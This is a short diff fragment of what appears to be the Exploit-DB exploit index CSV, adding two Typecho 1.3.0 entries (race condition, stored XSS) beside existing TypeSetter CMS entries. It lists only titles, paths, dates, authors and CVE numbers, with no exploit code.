+52161,exploits/php/webapps/52161.go,"Typecho 1.3.0 - Race Condition",2025-04-10,cyberaz0r,webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-35539,,,,,
+52162,exploits/php/webapps/52162.go,"Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)",2025-04-10,cyberaz0r,webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-35540,,,,,
 49128,exploits/php/webapps/49128.txt,"TypeSetter 5.1 - CSRF (Change admin e-mail)",2020-12-01,"Alperen Ergel",webapps,php,,2020-12-01,2020-12-01,0,,,,,,
 44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php,,2018-02-13,2018-02-13,0,CVE-2018-6889,,,,,
 48852,exploits/php/webapps/48852.txt,"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting",2020-10-01,"Alperen Ergel",webapps,php,,2020-10-01,2020-10-01,0,,,,,,